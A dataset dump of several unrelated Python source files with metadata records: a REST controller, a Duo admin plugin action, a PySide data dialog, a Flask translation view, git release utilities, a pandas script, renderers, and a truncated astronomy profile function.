You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport pecan\nfrom pecan import abort\nfrom pecan import expose\nfrom pecan import rest\nimport six\nfrom six.moves import http_client\nfrom wsme import types as wtypes\nfrom wsmeext.pecan import wsexpose\n\nfrom nacsa.api.controllers.v1 import base\nfrom nacsa.api.controllers.v1 import capabilities\nfrom nacsa.api.controllers.v1 import inventories\nfrom nacsa.api.controllers.v1 import types\nfrom nacsa.api.controllers.v1 import weights\nfrom nacsa.db import exception as db_exc\nfrom nacsa import objects\n\n\nclass ResourceProvider(base.APIBase):\n \"\"\"API representation of a resource provider.\n\n This class enforces type checking and value constraints, and converts\n between the internal object model and the API representation of\n a resource provider.\n \"\"\"\n\n id = int\n uuid = types.uuid\n parent_uuid = types.uuid\n name = wtypes.text\n path = wtypes.text\n\n def __init__(self, **kwargs):\n self.fields = []\n for field in objects.ResourceProvider.fields:\n # Skip fields we do not expose.\n if not hasattr(self, field):\n continue\n self.fields.append(field)\n setattr(self, field, kwargs.get(field, wtypes.Unset))\n\n @classmethod\n def from_result(cls, result):\n \"\"\"Convert a NacsaObjectDB object to a ResourceProvider object.\n :param result: a :class:`nacsa.objects.base.NacsaObjectDB ` object.\n :returns: a :class:`nacsa.api.controllers.v1.resource_provider.\n ResourceProvider` object.\n \"\"\"\n instance = cls()\n exposed_fields = set(objects.ResourceProvider.fields)\n exposed_fields -= set(['generation'])\n for field in exposed_fields:\n setattr(instance, field, getattr(result, field))\n return instance\n\n\nclass ResourceProviderController(rest.RestController):\n \"\"\"REST controller for resource provider.\"\"\"\n\n @wsexpose([ResourceProvider])\n def get_all(self):\n \"\"\"Retrieve all resource providers.\n \"\"\"\n return map(ResourceProvider.from_result,\n objects.ResourceProvider.query())\n\n @wsexpose(ResourceProvider, types.uuid)\n def get_one(self, uuid):\n \"\"\"Retrieve information about the given resource provider.\n :param uuid: UUID of a resource provider.\n \"\"\"\n res_resource_provider = objects.ResourceProvider.get_by_uuid(uuid)\n return ResourceProvider.from_result(res_resource_provider)\n\n @wsexpose(ResourceProvider, body=ResourceProvider,\n status_code=http_client.CREATED)\n def post(self, resource_provider):\n \"\"\"Create a new resource_provider.\n :param resource_provider: a resource_provider within the request body.\n \"\"\"\n new_resource_provider = objects.ResourceProvider(pecan.request.context,\n **resource_provider.as_dict())\n new_resource_provider.create()\n return ResourceProvider.from_result(new_resource_provider)\n\n @wsexpose(ResourceProvider, types.uuid, body=types.jsontype)\n def patch(self, uuid, patch_fields):\n \"\"\"Update an existing resource provider.\n :param uuid: UUID of a resource provider.\n :param patch_fields: a json PATCH values to apply\n to this resource provider.\n \"\"\"\n res_resource_provider = objects.ResourceProvider.get_by_uuid(uuid)\n\n # set only exposed fields\n for field, value in 
six.iteritems(patch_fields):\n            if field in objects.ResourceProvider.fields:\n                setattr(res_resource_provider, field, value)\n\n        res_resource_provider.save()\n        return ResourceProvider.from_result(res_resource_provider)\n\n    @wsexpose(None, types.uuid, status_code=http_client.NO_CONTENT)\n    def delete(self, uuid):\n        \"\"\"Delete a resource provider.\n        :param uuid: UUID of a resource provider.\n        \"\"\"\n        weights = objects.Weight.get_by_uuid(uuid)\n        for weight in weights:\n            weight.destroy()\n        res_resource_provider = objects.ResourceProvider.get_by_uuid(uuid)\n        res_resource_provider.destroy()\n\n    @expose()\n    def _lookup(self, uuid, next_controller, *remainder):\n        try:\n            rp_db = objects.ResourceProvider.get_by_uuid(uuid)\n        except db_exc.ResourceProviderNotFound:\n            abort(http_client.NOT_FOUND,\n                  detail=''.join(('Resource provider with uuid ',\n                                  uuid,\n                                  ' could not be found')))\n\n        if next_controller == 'inventories':\n            return inventories.InventoryController(rp_db), remainder\n        elif next_controller == 'capabilities':\n            return capabilities.CapabilityController(rp_db), remainder\n        elif next_controller == 'weights':\n            return weights.WeightControllerFromRp(rp_db), remainder\n        abort(http_client.NOT_FOUND)\n","sub_path":"nacsa/api/controllers/v1/resource_providers.py","file_name":"resource_providers.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"219358520","text":"import komand\nfrom komand.exceptions import PluginException\nfrom .schema import GetUserStatusInput, GetUserStatusOutput, Input, Output, Component\n# Custom imports below\n\n\nclass GetUserStatus(komand.Action):\n\n    def __init__(self):\n        super(self.__class__, self).__init__(\n            name='get_user_status',\n            description=Component.DESCRIPTION,\n            input=GetUserStatusInput(),\n            output=GetUserStatusOutput())\n\n    def run(self, params={}):\n        username = params.get(Input.USER)\n        users = self.connection.admin_api.get_users()\n\n        if not users:\n            raise PluginException(preset=PluginException.Preset.NOT_FOUND, data=\"Error: No users exist!\")\n\n        for user in users:\n            if user[\"username\"] != username:\n                continue\n\n            return {Output.STATUS: user[\"status\"], Output.USER_ID: user[\"user_id\"]}\n        else:  # for/else: reached only when the loop found no matching username\n            raise PluginException(preset=PluginException.Preset.NOT_FOUND, data=\"Error: User not found\")\n
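\n# Hypothetical usage sketch (editor's note, not part of the upstream plugin),\n# assuming Admin API entries shaped like {'username': ..., 'status': ..., 'user_id': ...}:\n#   run({Input.USER: 'jdoe'}) -> {Output.STATUS: 'active', Output.USER_ID: 'DU...'}\n# while an unknown username raises PluginException via the for/else branch above.\n","sub_path":"duo_admin/komand_duo_admin/actions/get_user_status/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"485193365","text":"import logging\nfrom datetime import datetime\n\nfrom PySide2.QtCore import Qt, Signal, Property, Slot, QEvent\nfrom PySide2.QtSql import QSqlRelationalDelegate\nfrom PySide2.QtWidgets import QDialog, QMessageBox\nfrom PySide2.QtWidgets import QStyledItemDelegate\n\nfrom jal.ui.ui_reference_data_dlg import Ui_ReferenceDataDialog\nimport jal.ui_custom.reference_selector as ui # Full import due to \"cyclic\" reference\nfrom jal.ui_custom.helpers import g_tr, UseSqlTable, ConfigureTableView, rel_idx\nfrom jal.db.helpers import readSQL\n\n\n# --------------------------------------------------------------------------------------------------------------\n# Class to display and edit table with reference data (accounts, categories, tags...)\n# --------------------------------------------------------------------------------------------------------------\nclass ReferenceDataDialog(QDialog, Ui_ReferenceDataDialog):\n    # 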
----------------------------------------------------------------------------------------------------------\n # Params:\n # db - QSqlDatabase object for DB operations\n # table - name of the table to display/edit\n # columns - list of tuples - see helpers.py for details\n # title - title of dialog window\n # search_field - field name which will be used for search from GUI\n # tree_view - table will be displayed as hierarchical tree with help of 3 columns: 'id', 'pid' and 'children_count'\n # ('pid' will identify parent row for current row, and '+' will be displayed for row with 'children_count'>0\n # relations - list of tuples that define lookup relations to other tables in database:\n def __init__(self, db, table, columns, title='',\n search_field=None, toggle=None, tree_view=False, relations=None):\n QDialog.__init__(self)\n self.setupUi(self)\n\n self.selected_id = 0\n self.p_selected_name = ''\n self.dialog_visible = False\n self.selection_enabled = False\n self.tree_view = tree_view\n self.parent = 0\n self.last_parent = 0\n self.group_id = None\n self.group_key_field = None\n self.group_key_index = None\n self.group_fkey_field = None\n self.toggle_state = False\n self.toggle_field = None\n self.search_text = \"\"\n self.search_field = search_field\n\n self.db = db\n self.table = table\n self.Model = UseSqlTable(self, self.table, columns, relations)\n self.delegates = ConfigureTableView(self.DataView, self.Model, columns)\n # Storage of delegates inside class is required to keep ownership and prevent SIGSEGV as\n # https://doc.qt.io/qt-5/qabstractitemview.html#setItemDelegateForColumn says:\n # Any existing column delegate for column will be removed, but not deleted.\n # QAbstractItemView does not take ownership of delegate.\n\n self.GroupLbl.setVisible(False)\n self.GroupCombo.setVisible(False)\n if relations is not None:\n for relation in relations:\n if relation[rel_idx.GROUP_NAME] is not None:\n self.GroupLbl.setVisible(True)\n self.GroupLbl.setText(relation[rel_idx.GROUP_NAME])\n self.GroupCombo.setVisible(True)\n self.group_key_field = relation[rel_idx.KEY_FIELD]\n self.group_key_index = self.Model.fieldIndex(relation[rel_idx.KEY_FIELD])\n self.group_fkey_field = relation[rel_idx.FOREIGN_KEY]\n relation_model = self.Model.relationModel(self.group_key_index)\n self.GroupCombo.setModel(relation_model)\n self.GroupCombo.setModelColumn(relation_model.fieldIndex(relation[rel_idx.LOOKUP_FIELD]))\n self.group_id = relation_model.data(relation_model.index(0,\n relation_model.fieldIndex(self.group_fkey_field)))\n\n self.Toggle.setVisible(False)\n if toggle:\n self.Toggle.setVisible(True)\n self.toggle_field = toggle[0]\n self.Toggle.setText(toggle[1])\n\n self.setWindowTitle(title)\n if self.search_field is not None:\n self.SearchFrame.setVisible(True)\n else:\n self.SearchFrame.setVisible(False)\n self.UpBtn.setVisible(self.tree_view)\n\n self.SearchString.textChanged.connect(self.OnSearchChange)\n self.UpBtn.clicked.connect(self.OnUpClick)\n self.GroupCombo.currentIndexChanged.connect(self.OnGroupChange)\n self.Toggle.stateChanged.connect(self.OnToggleChange)\n self.AddBtn.clicked.connect(self.OnAdd)\n self.RemoveBtn.clicked.connect(self.OnRemove)\n self.CommitBtn.clicked.connect(self.OnCommit)\n self.RevertBtn.clicked.connect(self.OnRevert)\n self.DataView.clicked.connect(self.OnClicked)\n self.DataView.doubleClicked.connect(self.OnDoubleClicked)\n self.DataView.selectionModel().selectionChanged.connect(self.OnRowSelected)\n self.Model.dataChanged.connect(self.OnDataChanged)\n\n 
self.Model.select()\n self.setFilter()\n\n @Slot()\n def closeEvent(self, event):\n if self.CommitBtn.isEnabled(): # There are uncommited changed in a table\n if QMessageBox().warning(None, g_tr('ReferenceDataDialog', \"Confirmation\"),\n g_tr('ReferenceDataDialog', \"You have uncommited changes. Do you want to close?\"),\n QMessageBox.Yes, QMessageBox.No) == QMessageBox.No:\n event.ignore()\n return\n else:\n self.Model.revertAll()\n event.accept()\n\n # Overload ancestor method to activate/deactivate filters for table view\n def exec_(self, enable_selection=False):\n self.dialog_visible = True\n self.selection_enabled = enable_selection\n self.setFilter()\n res = super().exec_()\n self.dialog_visible = False\n self.resetFilter()\n return res\n\n def getSelectedName(self):\n if self.selected_id == 0:\n return g_tr('ReferenceDataDialog', \"ANY\")\n else:\n return self.p_selected_name\n\n def setSelectedName(self, selected_id):\n pass\n\n @Signal\n def selected_name_changed(self):\n pass\n\n SelectedName = Property(str, getSelectedName, setSelectedName, notify=selected_name_changed)\n\n @Slot()\n def OnDataChanged(self):\n self.CommitBtn.setEnabled(True)\n self.RevertBtn.setEnabled(True)\n\n @Slot()\n def OnAdd(self):\n new_record = self.Model.record()\n if self.tree_view:\n new_record.setValue('pid', self.parent) # set current parent\n assert self.Model.insertRows(0, 1)\n self.Model.setRecord(0, new_record)\n self.CommitBtn.setEnabled(True)\n self.RevertBtn.setEnabled(True)\n\n @Slot()\n def OnRemove(self):\n idx = self.DataView.selectionModel().selection().indexes()\n selected_row = idx[0].row()\n assert self.Model.removeRow(selected_row)\n self.CommitBtn.setEnabled(True)\n self.RevertBtn.setEnabled(True)\n\n @Slot()\n def OnCommit(self):\n if self.group_key_index is not None:\n record = self.Model.record(0)\n group_field = record.value(self.Model.fieldIndex(self.group_key_field))\n if not group_field:\n self.Model.setData(self.Model.index(0, self.group_key_index), self.group_id)\n if not self.Model.submitAll():\n logging.fatal(g_tr('ReferenceDataDialog', \"Submit failed: \") + self.Model.lastError().text())\n return\n self.CommitBtn.setEnabled(False)\n self.RevertBtn.setEnabled(False)\n\n @Slot()\n def OnRevert(self):\n self.Model.revertAll()\n self.CommitBtn.setEnabled(False)\n self.RevertBtn.setEnabled(False)\n\n def resetFilter(self):\n self.DataView.model().setFilter(\"\")\n\n def setFilter(self): # TODO: correctly combine different conditions\n if not self.dialog_visible:\n return\n\n conditions = []\n if self.search_text:\n conditions.append(f\"{self.search_field} LIKE '%{self.search_text}%'\")\n else:\n if self.tree_view:\n conditions.append(f\"pid={self.parent}\")\n\n if self.group_id:\n conditions.append(f\"{self.table}.{self.group_key_field}={self.group_id}\")\n\n if self.toggle_field:\n if not self.toggle_state:\n conditions.append(f\"{self.table}.{self.toggle_field}=1\")\n\n condition = \"\"\n for line in conditions:\n condition += line + \" AND \"\n condition = condition[:-len(\" AND \")]\n\n self.DataView.model().setFilter(condition)\n\n @Slot()\n def OnSearchChange(self):\n self.search_text = self.SearchString.text()\n self.setFilter()\n\n @Slot()\n def OnRowSelected(self, selected, _deselected):\n idx = selected.indexes()\n if idx:\n selected_row = idx[0].row()\n self.selected_id = self.DataView.model().record(selected_row).value('id')\n self.p_selected_name = self.DataView.model().record(selected_row).value('name')\n\n @Slot()\n def OnClicked(self, index):\n if 
index.column() == 0:\n selected_row = index.row()\n self.parent = self.DataView.model().record(selected_row).value('id')\n self.last_parent = self.DataView.model().record(selected_row).value('pid')\n if self.search_text:\n self.SearchString.setText('') # it will also call self.setFilter()\n else:\n self.setFilter()\n\n @Slot()\n def OnDoubleClicked(self, index):\n self.selected_id = self.DataView.model().record(index.row()).value('id')\n self.p_selected_name = self.DataView.model().record(index.row()).value('name')\n if self.selection_enabled:\n self.setResult(QDialog.Accepted)\n self.close()\n\n @Slot()\n def OnUpClick(self):\n if self.search_text: # list filtered by search string\n return\n current_id = self.DataView.model().record(0).value('id')\n if current_id is None:\n pid = self.last_parent\n else:\n pid = readSQL(self.db,\n f\"SELECT c2.pid FROM {self.table} AS c1 LEFT JOIN {self.table} AS c2 ON c1.pid=c2.id \"\\\n f\"WHERE c1.id = :current_id\", [(\":current_id\", current_id)])\n if pid == '':\n pid = 0\n self.parent = pid\n self.setFilter()\n\n @Slot()\n def OnGroupChange(self, list_id):\n model = self.GroupCombo.model()\n self.group_id = model.data(model.index(list_id, model.fieldIndex(self.group_fkey_field)))\n self.setFilter()\n\n @Slot()\n def OnToggleChange(self, state):\n if state == 0:\n self.toggle_state = False\n else:\n self.toggle_state = True\n self.setFilter()\n\n# ===================================================================================================================\n# Delegates to customize view of columns\n# ===================================================================================================================\n\n# -------------------------------------------------------------------------------------------------------------------\n# Display '+' if element have children\nclass ReferenceTreeDelegate(QStyledItemDelegate):\n def __init__(self, parent=None):\n QStyledItemDelegate.__init__(self, parent)\n\n def paint(self, painter, option, index):\n painter.save()\n model = index.model()\n children_count = model.data(model.index(index.row(), model.fieldIndex('children_count')), Qt.DisplayRole)\n text = ''\n if children_count:\n text = '+'\n painter.drawText(option.rect, Qt.AlignHCenter, text)\n painter.restore()\n\n# -------------------------------------------------------------------------------------------------------------------\n# Display '*' if true and empty cell if false\n# Toggle True/False by mouse click\nclass ReferenceBoolDelegate(QStyledItemDelegate):\n def __init__(self, parent=None):\n QStyledItemDelegate.__init__(self, parent)\n\n def paint(self, painter, option, index):\n painter.save()\n model = index.model()\n status = model.data(index, Qt.DisplayRole)\n if status:\n text = ' * '\n else:\n text = ''\n painter.drawText(option.rect, Qt.AlignHCenter, text)\n painter.restore()\n\n def editorEvent(self, event, model, option, index):\n if event.type() == QEvent.MouseButtonPress:\n if model.data(index, Qt.DisplayRole): # Toggle value - from 1 to 0 and from 0 to 1\n model.setData(index, 0)\n else:\n model.setData(index, 1)\n return True\n\n# -------------------------------------------------------------------------------------------------------------------\n# Make integer alignment to the right\nclass ReferenceIntDelegate(QStyledItemDelegate):\n def __init__(self, parent=None):\n QStyledItemDelegate.__init__(self, parent)\n\n def paint(self, painter, option, index):\n painter.save()\n model = index.model()\n value = model.data(index, 
Qt.DisplayRole)\n painter.drawText(option.rect, Qt.AlignRight, f\"{value} \")\n painter.restore()\n\n# -------------------------------------------------------------------------------------------------------------------\n# Format unix timestamp into readable form '%d/%m/%Y %H:%M:%S'\nclass ReferenceTimestampDelegate(QStyledItemDelegate):\n def __init__(self, parent=None):\n QStyledItemDelegate.__init__(self, parent)\n\n def paint(self, painter, option, index):\n painter.save()\n model = index.model()\n timestamp = model.data(index, Qt.DisplayRole)\n if timestamp:\n text = datetime.utcfromtimestamp(timestamp).strftime('%d/%m/%Y %H:%M:%S')\n else:\n text = \"\"\n painter.drawText(option.rect, Qt.AlignLeft, text)\n painter.restore()\n\n# -------------------------------------------------------------------------------------------------------------------\n# The class itself is empty but it activates built-in editors for lookup tables\nclass ReferenceLookupDelegate(QSqlRelationalDelegate):\n def __init__(self, parent=None):\n QSqlRelationalDelegate.__init__(self, parent)\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Delegate to display tag editor\nclass ReferencePeerDelegate(QSqlRelationalDelegate):\n def __init__(self, parent=None):\n QSqlRelationalDelegate.__init__(self, parent)\n\n def createEditor(self, aParent, option, index):\n peer_selector = ui.PeerSelector(aParent)\n peer_selector.init_db(index.model().database())\n return peer_selector\n\n def setModelData(self, editor, model, index):\n model.setData(index, editor.selected_id)","sub_path":"jal/ui_custom/reference_data.py","file_name":"reference_data.py","file_ext":"py","file_size_in_byte":15072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"323700771","text":"from flask import render_template, Blueprint, request, redirect, url_for, abort, jsonify, g, flash\nfrom project import db, app\nfrom project.models import Translation\nfrom project.communication import Publisher\nfrom .forms import ReusableForm\nimport json\n\ntranslate_blueprint = Blueprint('translate', __name__)\n\ndef is_post():\n return (request.method == 'POST')\n\n#@app.route(\"/\", methods=['GET', 'POST'])\n#@app.route(\"/index\", methods=['GET', 'POST'])\n#@app.route(\"/translate\", methods=['GET', 'POST'])\n@translate_blueprint.route('/', methods=['GET','POST'])\n#@app.cache.memoize(timeout=5)\n@app.cache.cached(timeout=5, key_prefix='page')\ndef translate():\n form = ReusableForm(request.form)\n print (form.errors)\n\n if request.method == 'POST':\n text=request.form['text']\n print (text)\n \n if form.validate():\n # Save the comment here.\n # save database\n try:\n result = Translation(\n original=text,\n status='requested',\n )\n db.session.add(result)\n db.session.commit()\n \n #app.cache.delete_memoized(get_all_translations)\n app.cache.delete('get_all_translations')\n \n print(\" [x] Saved Text to Translate \" + str(result.id))\n except Exception as e:\n print (e)\n flash('Error: Saving database')\n return redirect(url_for('translate.html', form=form))\n\n #send request\n publisher = Publisher()\n publisher.publish(json.dumps(result.as_dict()))\n print(\" [x] Sent Text to Translate \" + json.dumps(result.as_dict()))\n\n flash(text)\n else:\n flash('Error: Text is required')\n \n translations = get_all_translations() \n\n return render_template('translate.html', title='Home', form=form,\n 
translations=translations)\n\n#@app.cache.memoize()\n@app.cache.cached(timeout=5, key_prefix='get_all_translations')\ndef get_all_translations():\n return Translation.query.order_by(Translation.translated_count.desc()).all()","sub_path":"web/project/translate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"300496270","text":"#!/usr/bin/env python3\n#\n# srt - stable rt tooling\n#\n# Copyright (c) Siemens AG, 2018\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE\n\n\nimport os\nimport re\nimport sys\nfrom configparser import SafeConfigParser\nfrom logging import debug, error\nfrom subprocess import PIPE, CalledProcessError, run\n\n\ndef cmd(args, verbose=False, env=None):\n if verbose:\n print(' '.join(args))\n debug('run: ' + ' '.join(args))\n p = run(args, check=True, stdout=PIPE, env=env)\n r = p.stdout.decode('utf-8').strip()\n debug(' ' + r)\n return r\n\n\ndef get_remote_repo_name():\n line = cmd(['git', 'config', '--get', 'remote.origin.url'])\n name = os.path.splitext(os.path.basename(line))[0]\n return name\n\n\ndef get_local_branch_name():\n return cmd(['git', 'rev-parse', '--abbrev-ref', 'HEAD']).strip()\n\n\ndef get_remote_branch_name(short=True):\n name = cmd(['git', 'rev-parse', '--abbrev-ref',\n '--symbolic-full-name', '@{u}'])\n if short:\n return name.split('/')[1]\n return name\n\n\ndef tag_exists(tag):\n try:\n run(['git', 'rev-parse', '--verify',\n '--quiet', '{0}^{{tag}}'.format(tag)],\n check=True, stdout=PIPE)\n except CalledProcessError:\n return False\n return True\n\n\ndef get_last_tag(branch_name, postfix=None):\n if postfix:\n base_branch = branch_name[:-len(postfix)]\n else:\n base_branch = branch_name\n last_tag = cmd(['git', 'describe', '--abbrev=0', '--tags', base_branch])\n return last_tag\n\n\ndef get_last_rt_tag(branch_name, postfix=None):\n last_tag = get_last_tag(branch_name, postfix)\n m = re.search(r'(-rt[0-9]+)$', last_tag)\n if not m:\n print('Last tag {0} does not end in -rt[0-9]+ on {1}'.\n format(last_tag, branch_name),\n file=sys.stderr)\n sys.exit(1)\n return m.group(1)\n\n\ndef get_old_tag():\n last_tag = get_last_tag(get_remote_branch_name())\n\n import logging\n log = logging.getLogger()\n log.debug(last_tag)\n\n m = re.match(r'^v(\\d+)\\.(\\d+)\\.(\\d+)-rt(\\d+)(-rc(\\d+))?$', last_tag)\n major = int(m.group(1))\n minor = int(m.group(2))\n base_version = 'v{}.{}'.format(major, minor)\n\n tags = 
cmd(['git', 'ls-remote', '--tags'])\n    match = r'.*({}\\.\\d+-rt\\d+)$'.format(base_version)\n    m = re.findall(match, tags, re.MULTILINE)\n    if not m:\n        print('Last remote tag -rt[0-9]+ not found on {}'.\n              format(get_remote_branch_name()))\n        sys.exit(1)\n\n    last_patch = 0\n    last_rt = 0\n    last_rc = None\n    for f in m:\n        m2 = re.match(r'^v(\\d+)\\.(\\d+)\\.(\\d+)-rt(\\d+)(-rc(\\d+))?$', f)\n        patch = int(m2.group(3))\n        rt = int(m2.group(4))\n\n        if patch > last_patch:\n            last_patch = patch\n            last_rt = rt\n\n        if rt > last_rt:\n            last_rt = rt\n\n        rc = m2.group(6)  # the rc number alone; group(5) would include the '-rc' prefix\n        if rc is not None and (last_rc is None or int(rc) > int(last_rc)):\n            last_rc = int(rc)  # compare numerically; last_rc starts as None and must be seeded here\n\n    tag = '{}.{}-rt{}'.format(base_version, last_patch, last_rt)\n    if last_rc:\n        tag = tag + '-rc{}'.format(last_rc)\n    return tag\n\n\ndef is_dirty():\n    line = cmd(['git', 'status', '--short'])\n    if line != '':\n        return True\n    return False\n\n\ndef read_config():\n    config = SafeConfigParser()\n    dirs = [os.curdir,\n            os.path.expanduser('~/.config/'),\n            os.path.expanduser('~'),\n            '/etc/srt']\n    if 'SRT_CONF' in os.environ:\n        dirs.insert(0, os.environ.get('SRT_CONF'))\n    config.read(list(map(lambda x: x + '/srt.conf', dirs)))\n    return config\n\n\ndef get_config():\n    config_name = 'unknown'  # pre-set so the error path below cannot hit an unbound name\n    try:\n        repo_name = get_remote_repo_name()\n        branch_name = get_remote_branch_name(short=False)\n        config_name = '{0}/{1}'.format(repo_name, branch_name)\n        debug('Using configuration {0}'.format(config_name))\n        config = read_config()[config_name]\n    except (CalledProcessError, KeyError):  # KeyError: section missing from srt.conf\n        error('Could not retrieve configuration {0} from srt.conf'.format(\n            config_name))\n        sys.exit(1)\n\n    return config\n\n\ndef get_gnupghome(config):\n    gnupghome = os.getenv('GNUPGHOME', '~/.gnupg')\n    if 'GNUPGHOME' in config:\n        gnupghome = config['GNUPGHOME']\n    return gnupghome\n\n\ndef get_gpg_fingerprint(config):\n    out = cmd(['gpg2',\n               '--homedir', get_gnupghome(config),\n               '--local-user', '{}'.format(config['GPG_KEY_ID']),\n               '--fingerprint'])\n\n    # thank you gpg for nothing! (the fingerprint sits on output line 4, hence cnt == 3)\n    fingerprint = ''\n    cnt = 0\n    for line in out.splitlines():\n        if cnt == 3:\n            fingerprint = line.strip()\n            break\n        cnt += 1\n    return fingerprint\n\n\ndef confirm(text):\n    try:\n        while True:\n            reply = str(input(text + ' (y/n): ')).lower().strip()\n            if reply[:1] == 'y':\n                return True\n            if reply[:1] == 'n':\n                return False\n    except KeyboardInterrupt:\n        return False\n
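\n# Example (hypothetical session): confirm('Push the new tag?') keeps prompting\n# until the reply starts with 'y' (returns True) or 'n' (returns False);\n# Ctrl-C is treated as 'no'.\n\n\ndef check_context(ctx):\n    if ctx.old_tag == ctx.new_tag:\n        text = ('Something went wrong. '\n                'OLD_TAG and NEW_TAG are the same ({}).\\n'\n                'Did you push your changes already? 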
In this case you need to\\n'\n 'provide the OLD_TAG and NEW_TAG')\n print(text.format(ctx.old_tag))\n exit(1)\n\n tags = [ctx.old_tag, ctx.new_tag, ctx.new_tag.base]\n if not ctx.new_tag.is_rc:\n tags.append(ctx.new_tag.rebase)\n\n for tag in tags:\n debug('Check if tag {0} exists'.format(tag))\n if not tag_exists(tag):\n print('tag {0} doesn\\'t exists'.format(tag), file=sys.stderr)\n return None\n\n return ctx\n","sub_path":"stable_rt_tools/srt_util.py","file_name":"srt_util.py","file_ext":"py","file_size_in_byte":6609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"608922180","text":"import pandas as pd\n\n#df = pd.read_csv(\"population_growth.csv\")\ndf = pd.read_csv('gdp.csv')\n\ni = 0\ndata_new = pd.DataFrame(columns = ['Country Name','Country Code','Indicator Name','Indicator Code','Year'])\n\nindex = 0\nwhile index < 264:\n row = df.loc[index]\n gdp = row[4:66]\n country = row[0]\n code = row[1]\n iname = row[2]\n icode = row[3]\n\n y = 1960\n for x in gdp:\n data_new.loc[i]=([country,code,iname,icode,y])\n i += 1\n y += 1\n index += 1\ndata_new.to_csv(\"newgdp.csv\")\n\n","sub_path":"testing/column_row.py","file_name":"column_row.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461707834","text":"from abc import abstractmethod\nfrom time import sleep\n\nimport cv2\n\n\nclass Renderer(object):\n @abstractmethod\n def update(self, *args, **kwargs):\n raise NotImplementedError\n\nclass PixelRenderer(Renderer):\n\n def __init__(self, width=600, height=600, window_name='obs', delay=1, skip_frame=1, video=False):\n self.window_name = window_name\n self.delay = delay\n cv2.namedWindow(window_name, cv2.WINDOW_NORMAL)\n cv2.resizeWindow(window_name, width, height)\n\n self.video = video\n if video:\n self.vid = cv2.VideoWriter('demo.avi', cv2.VideoWriter_fourcc(*\"XVID\"), float(30), (160, 210), False)\n\n self.counter = 0\n self.skip_frame = skip_frame\n\n\n def update(self, env):\n screen = env.render()\n self.counter += 1\n if self.counter%self.skip_frame==0:\n cv2.imshow(self.window_name, screen)\n cv2.waitKey(self.delay)\n if self.video:\n self.vid.write(screen)\n\n def release(self):\n if self.video:\n self.vid.release()\n\nclass PygameRenderer(Renderer):\n def __init__(self, delay=0.1, skip_frame=1):\n self.counter = 0\n self.skip_frame = skip_frame\n self.delay = delay\n\n def update(self, env):\n self.counter += 1\n if self.counter % self.skip_frame == 0:\n env.render()\n sleep(self.delay)\n\n","sub_path":"rltg/utils/Renderer.py","file_name":"Renderer.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"457516863","text":"#!/usr/bin/env python\n\n# extract the radial profile along a given direction (radius,PA)\ndef profile(data, radius, posAngle, slitWidth):\n\n import numpy as np\n import w_subimg\n import copy\n from skimage import measure\n from skimage import feature\n\n ntrans = len(np.unique(data['lineID']))\n nepoch = len(np.unique(data['JD']))\n Phi = np.unique(data['Phi'])\n\n # http://www.python-course.eu/passing_arguments.php\n # https://jeffknupp.com/blog/2012/11/13/is-python-callbyvalue-or-callbyreference-neither/\n dic = copy.deepcopy(data) # <- THIS IS VERY IMPORTANT! 
KEEP copy.deepcopy()!\n dic['profile'] = [] # new key: line radial profile\n dic['radPos'] = [] # new key: positions where the radial profile was measured\n\n raw_images = [\n data['fileName'],\n data['image'],\n data['pixScale']\n ]\n\n for j in range(ntrans):\n\n for i in range(nepoch):\n\n index = i + j * nepoch\n\n # print(j, i, index, raw_images[0][index], coords_row, coords_col)\n\n if raw_images[0][index] == 'zero.fits':\n raw_images[1][index] = raw_images[1][index] * 0\n\n img = copy.deepcopy(raw_images[1][index])\n\n rho = radius # length in arcsec\n # theta=0 @ 6:00; theta=90 @ 3:00; theta=180 @ 12:00\n theta = (posAngle + 180. - 360.) if (posAngle >= 180.) else (posAngle + 180.)\n rho_x = rho * np.cos((theta) / 180. * np.pi)\n rho_y = rho * np.sin((theta) / 180. * np.pi)\n\n actual_image = img # transf.resize(raw_images[j][2], raw_images[0][2].shape)\n\n # center of image (same for X and Y)\n x0 = ((img.shape)[0] - 1) / 2\n dx = rho_x / raw_images[2][index]\n dy = rho_y / raw_images[2][index]\n x1 = x0 + dx\n y1 = x0 + dy\n\n # slit width\n lineWidth = slitWidth / raw_images[2][index]\n\n xstart, ystart = x0, x0\n xend, yend = x1, y1\n\n if j == 0:\n xstart0, ystart0, xend0, yend0 = xstart, 